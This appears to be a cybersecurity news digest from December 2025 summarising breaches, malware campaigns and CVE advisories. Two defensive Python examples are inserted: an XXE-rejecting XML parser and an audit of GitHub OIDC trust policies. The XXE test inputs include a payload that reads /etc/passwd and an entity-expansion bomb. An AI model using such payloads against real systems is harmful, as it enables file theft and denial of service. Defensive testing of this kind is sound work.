The French Ministry of the Interior has confirmed its email servers were compromised in a cyberattack detected between December 11 and 12, 2025. Interior Minister Laurent Nuñez stated that attackers stole staff email passwords, allowing them to access an unknown number of document files. While the government is still assessing the scale, a hacker group named 'Indra' has claimed, without evidence, to have exfiltrated police files on 16.4 million citizens. In response, the ministry is rolling out two-factor authentication and resetting passwords. The attack on the high-value government target, which oversees national police and security, has raised speculation of nation-state involvement, with groups like APT28 being considered.

Dec 17, 2025 · 5 min read

New 'ConsentFix' Phishing Attack Hijacks Microsoft Accounts, Bypassing MFA via Azure CLI Abuse

A novel and sophisticated phishing attack dubbed 'ConsentFix' allows attackers to hijack Microsoft accounts without stealing passwords or bypassing multi-factor authentication (MFA). Discovered by Push Security, the browser-native attack tricks users into completing a fake verification process that involves copying a URL containing a sensitive OAuth authorization code from their browser's address bar and pasting it into the attacker's phishing page. The attacker then uses this code to authenticate as the user via the legitimate and trusted Microsoft Azure Command-Line Interface (CLI). Because the Azure CLI is a first-party app, it bypasses many consent restrictions, granting the attacker full account access. The technique is active and circumvents even phishing-resistant authentication like passkeys.

Dec 17, 2025 · 5 min read

New Zealand Launches Massive Public Alert, Warning 26,000 Citizens of Lumma Stealer Malware Infections

In a first-of-its-kind campaign, New Zealand's National Cyber Security Centre (NCSC) is emailing approximately 26,000 people to warn them of potential infection by the Lumma Stealer malware. The potent information-stealing software targets Windows devices to covertly harvest sensitive data, including passwords, browser credentials, banking details, and cryptocurrency wallets. Officials have confirmed that some of the stolen credentials were linked to government and banking systems, heightening the risk of fraud. The NCSC's mass notification directs affected individuals to a government website with instructions for malware removal and improving account security.

Dec 17, 2025 · 4 min read

MITRE Extends D3FEND Cybersecurity Framework to Operational Technology (OT)

MITRE has officially extended its D3FEND cybersecurity framework to include Operational Technology (OT), providing a standardized knowledge base of defensive techniques for cyber-physical systems. Announced on December 16, 2025, the NSA-funded initiative aims to create a common language for securing critical infrastructure in sectors like energy, manufacturing, and defense. As OT systems become increasingly connected to IT networks, D3FEND for OT provides a structured ontology of countermeasures tailored to the unique components and risks of industrial environments, mapping defensive techniques to threats against controllers, sensors, and actuators.

Dec 17, 2025 · 4 min read

'Operation MoneyMount-ISO' Phishing Campaign Deploys Phantom Stealer via Malicious ISOs

A financially motivated, Russian-language phishing campaign dubbed 'Operation MoneyMount-ISO' is actively targeting finance and accounting departments to deploy the Phantom information-stealing malware. According to researchers at Seqrite Labs, the attack uses emails with fake payment confirmations that contain a malicious ISO disk image file. This technique is designed to bypass email security controls. When the user opens the ISO, it mounts a virtual drive with a disguised executable. Running this file triggers a memory-resident infection chain that deploys Phantom Stealer, which then harvests browser credentials, crypto wallets, and other sensitive data for exfiltration.

Dec 17, 2025 · 5 min read

Storm-0249 Evolves: Access Broker Now Deploys Ransomware with Advanced Stealth Tactics

The initial access broker (IAB) known as Storm-0249 is evolving its tactics, moving beyond simply selling network access to actively participating in malware deployment. According to ReliaQuest, the group now uses more sophisticated techniques, including DLL side-loading and fileless PowerShell execution, to facilitate ransomware attacks directly. Their methods involve social engineering victims into running malicious commands (`ClickFix`), which fetch and execute PowerShell scripts from spoofed domains. A key technique is dropping a trojanized version of a SentinelOne security agent DLL to run malware under the guise of a trusted process. This evolution signifies a dangerous trend where IABs are becoming more integrated into the ransomware deployment process, increasing their threat level.

Dec 16, 2025 · 6 min read

CISA Orders Federal Agencies to Patch Actively Exploited Critical GeoServer XXE Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical XML External Entity (XXE) injection vulnerability in OSGeo GeoServer, CVE-2025-58360, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated as high as CVSS 9.8, allows an unauthenticated remote attacker to read arbitrary files from the server, perform server-side request forgery (SSRF), or cause a denial of service. Citing evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by January 1, 2026. All organizations running the popular open-source geospatial data server are strongly urged to apply the available updates immediately.

Dec 16, 2025 · 5 min read

Active Attacks Exploit Critical Fortinet SSO Bypass Flaws to Gain Admin Access

Security firm Arctic Wolf has observed active exploitation of two critical authentication bypass vulnerabilities in Fortinet products, CVE-2025-59718 and CVE-2025-59719. Both flaws carry a CVSS score of 9.1 and allow an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) by forging a SAML message, granting administrative access to affected devices. The attacks, observed since December 12, 2025, target the default 'admin' account. The vulnerable code path is reachable only when the FortiCloud SSO feature is enabled, which can happen automatically when a device is registered. Patches are available, and administrators are urged to upgrade immediately or disable the feature until they can.

Dec 16, 2025 · 6 min read

FreePBX Patches Critical Auth Bypass and RCE Flaws; Update VoIP Platforms Immediately

The popular open-source VoIP platform FreePBX has been updated to fix several serious security vulnerabilities, including a critical authentication bypass (CVE-2025-66039) with a 9.3 CVSS score. This flaw, present in a non-default configuration, allows an attacker to bypass the admin login and potentially achieve remote code execution. Other patched high-severity issues include multiple authenticated SQL injection flaws (CVE-2025-61675) and an arbitrary file upload bug (CVE-2025-61678). These could be chained to upload a web shell and take full control of the server. Administrators are urged to update their FreePBX instances to the latest versions to mitigate these risks.

Dec 16, 2025 · 6 min read

New 'PyStoreRAT' Malware Spreads Via Fake OSINT and AI Tools on GitHub

A new malware campaign is distributing an information-stealing Remote Access Trojan (RAT) called 'PyStoreRAT' through fake GitHub repositories. Threat actors create repositories for what appear to be legitimate OSINT, AI, or DeFi tools, artificially inflating their popularity with fake stars and forks. After gaining a user's trust, the attackers push a malicious update containing PyStoreRAT. The malware is designed to evade detection, establish persistence, and steal sensitive data, with a particular focus on cryptocurrency wallets. It can also download secondary payloads like the Rhadamanthys infostealer and propagates via USB drives, posing a significant threat to developers and security researchers.

Dec 16, 2025 · 6 min read

700Credit Data Breach Exposes PII of 5.6 Million Individuals

The U.S. fintech company 700Credit, a major provider of credit reports and data services to the automotive industry, has disclosed a data breach affecting at least 5.6 million individuals. The incident, which occurred in October 2025, resulted in an unauthorized actor gaining access to and stealing a significant amount of personally identifiable information (PII). The compromised data includes names, addresses, dates of birth, and Social Security numbers. 700Credit serves approximately 18,000 auto dealerships, and the breach involved data collected between May and October 2025. The company is providing credit monitoring services to affected individuals, and authorities are urging victims to consider credit freezes to prevent identity theft and fraud.

Dec 15, 2025 · 6 min read

New 'Gentlemen' Ransomware Group Deploys Advanced GPO and BYOVD Attacks

A new ransomware operation, identifying itself as the "Gentlemen" group, has been observed conducting double-extortion attacks against corporate networks. The group employs sophisticated techniques to achieve its objectives, including the manipulation of Group Policy Objects (GPOs) for wide-scale ransomware deployment across victim networks. Additionally, the threat actor leverages the 'Bring Your Own Vulnerable Driver' (BYOVD) technique to escalate privileges and disable or bypass endpoint security solutions. The emergence of the Gentlemen group highlights the continued evolution in ransomware tactics, combining data theft with advanced defense evasion and lateral movement strategies.

Dec 15, 2025 · 6 min read

CVSS 10.0: Atlassian Patches Critical RCE Flaw in Apache Tika Dependency

Atlassian has issued security updates for a critical vulnerability, CVE-2025-66516, in the Apache Tika parser library, a third-party dependency used in many of its products. The flaw, which carries the maximum CVSS score of 10.0, is an XML External Entity (XXE) injection vulnerability. It can be triggered by uploading a specially crafted file, such as a PDF containing malicious XFA form data, and can lead to information disclosure, server-side request forgery (SSRF), or even remote code execution (RCE). The vulnerability affects a wide range of Atlassian's Server and Data Center products, including Jira, Confluence, and Bamboo. Customers are urged to apply the patches immediately.

Dec 15, 2025 · 6 min read
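Both the GeoServer entry (CVE-2025-58360) and the Apache Tika entry (CVE-2025-66516) above are XXE: the parser is handed attacker-controlled XML that declares an external entity, and the parser resolves it. The root cause is the same in every XXE, and so is the fix: a parser fed untrusted input must refuse DTDs outright rather than try to sanitise them. The block below shows that guard on Python's stdlib expat parser, the same approach the `defusedxml` library takes. It is an added example, not GeoServer or Tika code (both are Java), and the three documents it parses are constructed, including the `file:///etc/passwd` entity, which never gets resolved because the DOCTYPE handler raises first.

```python
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML while refusing any DTD; returns element names and text for demonstration."""
    parser = expat.ParserCreate()
    elements, chunks = [], []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so no entity is ever declared.
        raise DtdForbidden(f"DOCTYPE '{name}' not allowed in untrusted input")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        # Defence in depth: unreachable once DOCTYPE is refused, kept in case that handler is removed.
        raise DtdForbidden(f"entity declaration '{name}' not allowed")

    def refuse_external(context, base, sysid, pubid):
        # Returning 0 tells expat the reference was not resolved; expat then raises ExpatError.
        return 0

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = lambda tag, attrs: elements.append(tag)
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return {"elements": elements, "text": "".join(chunks).strip()}


def accepts(data: bytes) -> bool:
    """True if the guarded parser accepted the document."""
    try:
        parse_untrusted_xml(data)
        return True
    except (DtdForbidden, expat.ExpatError):
        return False


# Constructed inputs: one benign document, one classic file-read XXE, one entity-expansion bomb.
BENIGN_DOC = b"<data><item>ok</item></data>"
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data><item>&xxe;</item></data>"""
LAUGHS_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY a "aaaaaaaaaa"> <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"> ]>
<data>&b;</data>"""

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_DOC), ("xxe", XXE_DOC), ("laughs", LAUGHS_DOC)]:
        print(label, "accepted" if accepts(doc) else "rejected")
```

Refusing the DOCTYPE also closes the internal-entity expansion ("billion laughs") denial of service, which is why the GeoServer advisory lists DoS alongside file read and SSRF. In Java, the equivalent is disabling `DOCTYPE` declarations and external entities on the `XMLInputFactory` or `DocumentBuilderFactory` before parsing uploaded content.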

xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors

The cyber-espionage threat actor known as xHunt has resumed operations with a new campaign targeting organizations in Kuwait. Active since at least 2018, the group is focusing its latest attacks on the shipping, transportation, and government sectors. Researchers have observed xHunt infiltrating networks by targeting Microsoft Exchange and IIS web servers. Once inside, the group deploys a family of custom PowerShell-based backdoors, with tool names like 'Hisoka' and 'Netero' derived from the anime 'Hunter x Hunter'. The campaign's objective appears to be long-term intelligence collection and espionage, leveraging stealthy techniques to maintain persistence.

Dec 15, 2025 · 6 min read

New '01flip' Ransomware, Written in Rust, Targets Critical Infrastructure in APAC

A new and stealthy cross-platform ransomware strain named "01flip" has been discovered targeting critical infrastructure organizations in the Asia-Pacific region. The malware is written in the Rust programming language, enabling it to be compiled for both Windows and Linux systems and enhancing its ability to evade detection. Attackers have been observed exploiting exposed services for initial access, then deploying the open-source Sliver command-and-control (C2) framework for reconnaissance and lateral movement before executing the 01flip ransomware. The campaign highlights a growing trend of threat actors using modern, memory-safe languages like Rust to develop more sophisticated and evasive malware.

Dec 15, 2025 · 6 min read

LastPass Fined £1.2M by UK Regulator Over 2022 Security Failures

The UK's Information Commissioner's Office (ICO) has fined password manager provider LastPass £1.2 million (approximately $1.6 million) for significant security failures that led to a major data breach in 2022. The regulator found that LastPass failed to implement adequate technical and security measures to protect its users' data. The 2022 incident resulted in a threat actor gaining unauthorized access to a backup database, which contained the data of 1.6 million UK users, including encrypted password vaults. The fine highlights the serious regulatory consequences for security companies that do not meet their data protection obligations.

Dec 15, 2025 · 4 min read

India Confirms GPS Spoofing Attacks Targeted Seven Major Airports

The Indian government has officially confirmed that a series of cyber incidents involving GPS spoofing have occurred at seven of the nation's major airports. The attacks, which targeted airports in Delhi, Mumbai, Kolkata, and Bengaluru among others, disrupted navigation data for aircraft utilizing GPS-based landing procedures. Despite the signal manipulation, government officials reported that no flights were canceled or diverted. The successful handling of the incidents was attributed to the implementation of contingency measures and robust safeguards by Air Traffic Control, which allowed for safe operations using alternative navigation aids. The events underscore the growing vulnerability of critical transportation infrastructure to cyberattacks.

Dec 15, 2025 · 6 min read

Apple Rushes iOS 26.2 Update to Patch Two Actively Exploited Zero-Days

Apple has released an emergency security update, iOS 26.2 and iPadOS 26.2, to address 26 vulnerabilities. Among these are two critical zero-day flaws, CVE-2025-43529 and CVE-2025-14174, both residing in the WebKit browser engine. The company confirmed reports that these vulnerabilities have been actively exploited in sophisticated, targeted spyware campaigns, potentially allowing attackers to execute arbitrary code on unpatched devices. The update also patches a severe kernel vulnerability, CVE-2025-46285, that could grant an attacker root privileges. All iPhone and iPad users are urged to update their devices immediately.

Dec 14, 2025 · 5 min read

CISA KEV Alert: Actively Exploited RCE Flaw in Sierra Wireless Routers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Sierra Wireless AirLink routers, CVE-2018-4063, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score as high as 9.9, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE). Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies patch the vulnerability by a specified deadline, highlighting the severe risk it poses to network infrastructure.

Dec 14, 2025 · 4 min read

Germany Summons Russian Ambassador Over Suspected Air Traffic Control Cyberattack

In a significant diplomatic escalation, the German government has summoned the Russian Ambassador to Berlin following allegations of a cyberattack targeting the nation's air traffic control (ATC) systems. The incident, reported on December 13, 2025, has raised grave concerns about the security of Germany's critical national infrastructure and points towards a potential act of state-sponsored cyber-espionage or disruption. While technical details remain undisclosed, the move underscores the high stakes of cyber hostilities between Western nations and Russia.

Dec 14, 2025 · 4 min read

KillSec Ransomware Hits U.S. Financial Firm Daba Finance in Data Extortion Attack

The ransomware group known as KillSec has claimed responsibility for a cyberattack against Daba Finance Inc., a financial services company in the United States. On December 14, 2025, the group listed the company on its data leak site, employing a double-extortion tactic by threatening to release sensitive stolen data if a ransom is not paid. This incident underscores the persistent threat that data extortion gangs pose to the financial sector, which remains a high-value target due to the sensitive customer and corporate information it handles.

Dec 14, 2025 · 4 min read

WestJet Data Breach Exposes Info of 1.2 Million Passengers; Scattered Spider Suspected

Canadian airline WestJet has disclosed a significant data breach that occurred in June 2025, impacting approximately 1.2 million passengers. The compromised data includes sensitive personal information such as names, contact details, and travel documentation. While investigations are ongoing, some reports suggest the notorious Scattered Spider hacking group, known for its social engineering prowess, may be behind the attack. The breach poses a serious risk of identity theft and fraud for the affected customers.

Dec 14, 2025 · 4 min read

"Catastrophic" Data Breach at Norwegian News Agency NTB Exposes Customer Data

NTB (Norsk Telegrambyrå), Norway's leading news and content provider, has disclosed what it calls a "catastrophic" data breach that occurred in early December 2025. The company announced on December 13 that attackers exploited vulnerabilities in its systems to gain unauthorized access to its customer database, exposing sensitive personal information, detailed customer profiles, and internal communications for thousands of users. NTB is now undertaking a major overhaul of its security infrastructure in response.

Dec 14, 2025 · 3 min read

Eswatini Faces Cybersecurity Crisis as Government Fails to Act on Rising Threats

A report published on December 13, 2025, reveals a deepening cybersecurity crisis in the Kingdom of Eswatini. The nation is experiencing a significant increase in cyberattacks targeting citizens, businesses, and government bodies. This surge is compounded by a lack of effective government response, characterized by outdated laws, minimal funding for cybersecurity initiatives, a severe shortage of skilled personnel, and a failure to implement its own national cybersecurity strategy. As a result, the country's digital infrastructure remains highly vulnerable to escalating threats.

Dec 14, 2025 · 3 min read

Stealthy NANOREMOTE Backdoor Abuses Google Drive API for C2 Communications

A new and fully-featured Windows backdoor, dubbed NANOREMOTE, has been discovered by Elastic Security Labs. Written in C++, the malware distinguishes itself by using the Google Drive API for all command-and-control (C2) communications, allowing it to blend in with legitimate cloud traffic and evade traditional network security. The malware, which shares characteristics with the FINALDRAFT implant, is capable of reconnaissance, file transfer, and command execution. This tactic poses a significant challenge for organizations, especially those using Google Workspace, as it makes detecting malicious activity within sanctioned cloud services difficult.

Dec 13, 2025 · 5 min read

OpenAI Unveils Strategy to Manage 'High' Risk AI Cybersecurity Threats

OpenAI has announced its strategy for managing the significant cybersecurity risks posed by its increasingly powerful AI models. The company will now treat all future models as potentially 'High' risk under its Preparedness Framework, capable of automating vulnerability discovery and exploitation. Key components of the plan include forming a 'Frontier Risk Council' of external experts, creating a tiered, trusted access program for cyber defense tools, and collaborating with industry partners. The move reflects growing concerns over the potential weaponization of AI for malicious cyber operations.

Dec 13, 2025 · 3 min read

CISA Updates Cybersecurity Performance Goals for Critical Infrastructure

On December 11, CISA released an updated version of its voluntary Cybersecurity Performance Goals (CPGs), designed to help critical infrastructure operators bolster their defenses. The new version aligns with the latest NIST standards and places a stronger emphasis on governance, accountability, and risk management. The CPGs provide a baseline of measurable cybersecurity actions that organizations, including those in the healthcare sector, can take to protect against common and impactful threats, promoting a more resilient and proactive security posture.

Dec 13, 2025 · 3 min read

Makop Ransomware Evolves, Using GuLoader and New Exploits in Attacks on India

A new campaign by the Makop ransomware group is primarily targeting enterprises in India, with additional victims in Brazil and Germany. The attackers continue to use brute-force attacks against exposed RDP services for initial access. Once inside, they now use the GuLoader downloader to deliver secondary payloads like the AgentTesla and FormBook infostealers. For privilege escalation, the group is exploiting vulnerabilities like CVE-2025-7771 in the ThrottleStop driver to gain kernel-level access and disable security products before deploying the final ransomware payload.

Dec 13, 2025 · 5 min read

Google Patches Eighth Chrome Zero-Day of 2025 Under Active Attack

Google has released an emergency, out-of-band security update for its Chrome browser, patching its eighth zero-day vulnerability of 2025. The high-severity flaw, tracked as issue 466192044, is confirmed to be actively exploited in the wild. To prevent further abuse, Google has withheld technical details but analysis suggests it may be a buffer overflow in the ANGLE graphics library. All 3.4 billion Chrome users are urged to update their browsers immediately to version 143.0.7499.109 or later.

Dec 13, 2025 · 4 min read

Conduent Breach Exposes 10.5M Patients, Ranks as 8th Largest US Healthcare Breach

Business services giant Conduent has disclosed a massive data breach that exposed the personal and medical information of over 10.5 million people, making it the 8th largest healthcare data breach in U.S. history. The breach, which was active for months between October 2024 and January 2025, has already cost the company $25 million in response efforts. The compromised data includes names, Social Security numbers, and health information, leading to multiple class-action lawsuits against the company.

Dec 12, 2025 · 5 min read

"Battering RAM": $50 Hardware Attack Cracks Intel and AMD Secure CPU Enclaves

At the Black Hat Europe 2025 conference, researchers from KU Leuven University demonstrated "Battering RAM," a novel hardware attack that completely undermines modern confidential computing technologies. Using a custom-built DDR4 interposer costing just $50, the attack can bypass the memory encryption of secure enclaves like Intel SGX and AMD SEV. This allows an attacker with physical access to read encrypted memory at runtime, extract secret keys, and defeat protections previously thought to be secure against physical threats.

Dec 12, 2025 · 5 min read

TriZetto Discloses Year-Long Data Breach Exposing Patient PHI

TriZetto Provider Solutions, a healthcare revenue management company owned by Cognizant, has started notifying clients about a major data breach. An unauthorized party had access to patient data for nearly a full year, from November 2024 until the breach was detected on October 2, 2025. The attackers accessed historical reports containing sensitive Protected Health Information (PHI), including patient names, Social Security numbers, dates of birth, and health insurance details. The cybersecurity firm Mandiant was brought in to investigate the long-running intrusion.

Dec 12, 2025 · 5 min read

NATO Sharpens Cyber Defenses in Massive "Cyber Coalition" War Game

NATO has successfully concluded its largest annual cyber defense exercise, "Cyber Coalition," in Tallinn, Estonia. The week-long event involved approximately 1,500 military and civilian personnel from 29 NATO members and seven partner nations. Participants collaborated to defend a fictional nation's critical infrastructure against a series of realistic, hybrid cyberattacks, enhancing their collective ability to respond to modern threats.

Dec 11, 2025 · 4 min read

Critical Infrastructure at Risk Due to "Deficient" OT Cybersecurity Training

A new report from Australian cybersecurity firm Secolve has exposed significant deficiencies in operational technology (OT) cybersecurity training across critical infrastructure sectors. The survey of senior professionals in industries like energy, manufacturing, and water found that training is often generic, infrequent, or completely ignored. This lack of specialized training is creating a dangerously immature security culture and leaving vital industrial environments unprepared for cyberattacks.

Dec 11, 2025 · 4 min read

Hamas-Linked APT "Ashen Lepus" Targets Middle East with New "AshTag" Malware

The Hamas-affiliated advanced persistent threat (APT) group known as Ashen Lepus (or WIRTE) is conducting an ongoing espionage campaign targeting governmental and diplomatic entities in the Middle East. Researchers have identified a new, modular .NET malware suite named AshTag being used in these attacks. The campaign marks a significant evolution in the group's sophistication, incorporating enhanced encryption, in-memory payload execution, and the use of legitimate-looking subdomains to evade detection.

Dec 11, 2025 · 4 min read

"Operation DupeHike" Espionage Campaign Targets Russian Corporate HR Depts

A highly targeted cyber-espionage campaign, dubbed "Operation DupeHike," has been identified targeting employees in Russian corporations. Attributed to the threat actor cluster UNG0902, the campaign uses convincing social engineering lures, such as decoy documents about employee bonuses, to infiltrate networks. The primary targets are staff in HR, payroll, and administrative departments, with the goal of achieving persistent surveillance and exfiltrating sensitive corporate data.

Dec 11, 2025 · 4 min read

Unpatched Zero-Day in Gogs Git Service Actively Exploited to Gain SSH Access

A critical, unpatched zero-day vulnerability in Gogs, a popular self-hosted Git service, is being actively exploited in the wild. Tracked as CVE-2025-8110 with a CVSS score of 8.7, the flaw bypasses the fix for an earlier RCE and allows an attacker to overwrite arbitrary files, ultimately yielding SSH access to the server. Researchers at Wiz have identified over 700 compromised instances, with attackers deploying the Supershell C2 framework.

Dec 11, 2025 · 4 min read

Fake Leonardo DiCaprio Movie Torrent Used as Bait to Spread Agent Tesla Trojan

Cybercriminals are luring victims with a fake torrent for a new Leonardo DiCaprio movie to distribute the Agent Tesla information-stealing trojan. Security researchers at Bitdefender analyzed the campaign, revealing a complex, multi-stage attack chain that uses a malicious .lnk shortcut, hidden batch commands in subtitle files, and multiple layers of PowerShell to execute the final payload. The malware runs only in memory and establishes persistence through a fake audio diagnostic task, making it highly evasive.

Dec 11, 2025 · 4 min read

React2Shell: Critical 10.0 CVSS RCE Flaw in React and Next.js Under Active Exploitation

A critical, unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' (CVE-2025-55182), has been disclosed in React Server Components, affecting popular frameworks like Next.js. With a maximum CVSS score of 10.0, the flaw allows attackers to compromise servers with a single crafted HTTP request, requiring no user interaction. The vulnerability stems from an unsafe deserialization process in the 'Flight' protocol. Following the public disclosure on December 3, 2025, multiple weaponized proofs-of-concept became available, and active exploitation attempts by threat actors, including China-nexus groups, were observed. CISA has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies and urging all organizations to update affected components.

Dec 10, 2025 · 6 min read

Data Disaster: 4.3 Billion Records Leaked from Unprotected MongoDB Instance

One of the largest lead-generation data leaks ever recorded has been discovered by researchers from Cybernews and Bob Diachenko. An unprotected MongoDB instance, left publicly accessible without a password, exposed a staggering 4.3 billion documents, totaling 16.14 terabytes of data. The dataset contains highly detailed and structured professional and corporate intelligence, with much of the information appearing to be scraped from LinkedIn. Exposed data includes names, email addresses, phone numbers, employment history, and LinkedIn profile details. While the database was secured two days after discovery, the unknown duration of its exposure creates a significant risk of this data being used for sophisticated phishing, social engineering, and identity theft campaigns on a massive scale.

Dec 10, 2025 · 5 min read

OPSEC Fail: North Korean Spy 'Trevor Greer' Exposed by Own Infostealer Infection

In a major operational security (OPSEC) failure, a North Korean state-sponsored hacker was unmasked after accidentally infecting their own machine with commodity infostealer malware like LummaC2. The leaked logs, analyzed by Flashpoint and Hudson Rock, exposed the digital life of an operative using the persona 'Trevor Greer.' The data revealed fake identities, cryptocurrency ventures, and, most notably, a direct link to the $1.5 billion cryptocurrency heist from the exchange Bybit. The actor had registered a phishing domain, 'Bybit-assessment.com,' prior to the attack. This rare glimpse into an APT operator's personal machine highlights that even sophisticated actors make human errors, providing invaluable intelligence for defenders.

Dec 10, 2025 · 5 min read

GrayBravo MaaS Fuels Cybercrime with CastleLoader Malware

The cybercrime ecosystem is becoming more industrialized with the rise of Malware-as-a-Service (MaaS) operations like 'GrayBravo.' According to Recorded Future's Insikt Group, GrayBravo is developing and distributing a sophisticated loader called CastleLoader to at least four separate threat clusters. These clusters then use the loader to deploy various payloads, including RedLine Stealer and NetSupport RAT. The campaigns show specialization, with one group targeting the logistics sector using phishing and social engineering, while another uses Booking.com lures to target the hospitality industry. GrayBravo's operation, which features rapid development and a large infrastructure, exemplifies how MaaS providers empower less-skilled actors to launch effective and widespread attacks.

Dec 10, 2025 · 5 min read

DeadLock Ransomware Uses Vulnerable Baidu Driver to Blind EDRs

A new DeadLock ransomware campaign is leveraging a novel "Bring Your Own Vulnerable Driver" (BYOVD) loader to exploit a vulnerability (CVE-2024-51324) in a legitimate Baidu Antivirus driver, `BdApiUtil.sys`. This technique allows the threat actors to terminate any process, including endpoint detection and response (EDR) and antivirus solutions, from the kernel level. By blinding security tools, the attackers can deploy the ransomware unimpeded. The attack chain, analyzed by Cisco Talos, also involves PowerShell scripts to disable Windows Defender and delete volume shadow copies, severely hindering detection and recovery efforts.

Dec 9, 2025 · 5 min read

Code-to-Cloud Attacks: Leaked GitHub Tokens Become Keys to the Kingdom

Security researchers at Wiz have detailed an emerging "code-to-cloud" attack vector where threat actors leverage compromised GitHub Personal Access Tokens (PATs) to pivot from code repositories directly into production cloud environments. By abusing the trust between GitHub and connected Cloud Service Providers (CSPs), attackers with even basic read permissions can discover secret names, then use write permissions to execute malicious GitHub Actions that exfiltrate CSP credentials. The attack is particularly stealthy as API calls to search for secret names are not logged by GitHub Enterprise, creating a major visibility gap for defenders.

Dec 9, 2025 · 6 min read
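The code-to-cloud entry above ends with a GitHub Action that exfiltrates cloud credentials stored as repository secrets. The standard way to take that prize off the table is to stop storing long-lived cloud keys in GitHub at all and let workflows obtain short-lived credentials through OIDC federation, with the cloud-side trust policy pinned to one repository and ref. The audit below reads an AWS IAM role trust policy and flags the loosened forms (no `sub` condition, or a wildcard that matches more than one repository). This is an added example, not Wiz's research code; the trust-policy shape and the `token.actions.githubusercontent.com:aud`/`:sub` claim names are AWS and GitHub conventions, while the account id, organisation and repository names are placeholders.

```python
from typing import Any, Dict, Iterator, List, Tuple

GITHUB_OIDC = "token.actions.githubusercontent.com"
PROVIDER_ARN = "arn:aws:iam::123456789012:oidc-provider/" + GITHUB_OIDC   # placeholder account id


def _policy(condition: Dict[str, Dict[str, str]]) -> Dict[str, Any]:
    """Build a constructed trust policy for an IAM role assumed from GitHub Actions via OIDC."""
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": PROVIDER_ARN},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": condition,
    }]}


# Weak: only the audience is checked, so a workflow in ANY GitHub repository can assume the role.
WEAK_TRUST_POLICY = _policy({"StringEquals": {GITHUB_OIDC + ":aud": "sts.amazonaws.com"}})

# Org-wide: still lets every repository in the organisation (including one an attacker creates) in.
ORG_WIDE_TRUST_POLICY = _policy({
    "StringEquals": {GITHUB_OIDC + ":aud": "sts.amazonaws.com"},
    "StringLike": {GITHUB_OIDC + ":sub": "repo:acme-corp/*:ref:refs/heads/main"},
})

# Hardened: one repository, one branch.
HARDENED_TRUST_POLICY = _policy({"StringEquals": {
    GITHUB_OIDC + ":aud": "sts.amazonaws.com",
    GITHUB_OIDC + ":sub": "repo:acme-corp/payments-api:ref:refs/heads/main",
}})


def _flatten_conditions(stmt: Dict[str, Any]) -> Iterator[Tuple[str, str, str]]:
    """Yield (operator, key, value) triples, normalising single values to lists."""
    for op, kv in stmt.get("Condition", {}).items():
        for key, val in kv.items():
            for v in (val if isinstance(val, list) else [val]):
                yield op.lower(), key.lower(), str(v)


def audit_github_oidc_trust(policy: Dict[str, Any]) -> List[str]:
    """Return findings for Allow statements that trust the GitHub Actions OIDC provider."""
    findings: List[str] = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        federated = str(stmt.get("Principal", {}).get("Federated", ""))
        if stmt.get("Effect") != "Allow" or GITHUB_OIDC not in federated:
            continue
        conds = list(_flatten_conditions(stmt))
        auds = [v for _, k, v in conds if k == f"{GITHUB_OIDC}:aud"]
        subs = [v for _, k, v in conds if k == f"{GITHUB_OIDC}:sub"]
        if not auds:
            findings.append(f"statement {i}: no aud condition")
        if not subs:
            findings.append(f"statement {i}: no sub condition; a workflow in any GitHub repository can assume this role")
        for sub in subs:
            parts = sub.split(":")
            repo = parts[1] if len(parts) > 1 else ""
            if not sub.startswith("repo:") or not repo:
                findings.append(f"statement {i}: sub '{sub}' is not scoped to a repository")
            elif any(c in repo for c in "*?"):
                findings.append(f"statement {i}: sub '{sub}' matches more than one repository")
            elif any(c in sub for c in "*?"):
                findings.append(f"statement {i}: sub '{sub}' allows any ref, environment or pull_request run of {repo}")
    return findings


if __name__ == "__main__":
    for name, pol in [("weak", WEAK_TRUST_POLICY), ("org-wide", ORG_WIDE_TRUST_POLICY),
                      ("hardened", HARDENED_TRUST_POLICY)]:
        print(name, audit_github_oidc_trust(pol) or ["no findings"])
```

Pinning `sub` does not help if the pipeline still carries static keys in repository secrets, which is the case the entry describes; the audit is the check to run after those keys have been removed and the role is the only path from a workflow into the account.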

New 'Broadside' Botnet Exploits DVRs to Target Maritime Logistics

A new, sophisticated variant of the Mirai botnet, dubbed "Broadside," is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK Digital Video Recorder (DVR) devices. According to research from Cydome, the campaign specifically targets the maritime logistics sector, where these DVRs are common. Broadside is more advanced than typical Mirai variants, using stealthier techniques and a custom C2 protocol. Crucially, its goals extend beyond DDoS to include credential harvesting and lateral movement, turning compromised DVRs into strategic footholds on vessel networks.

Dec 9, 2025 · 6 min read

AI Threat Hunting Exposes 'GhostPenguin,' a Linux Backdoor Undetected for Months

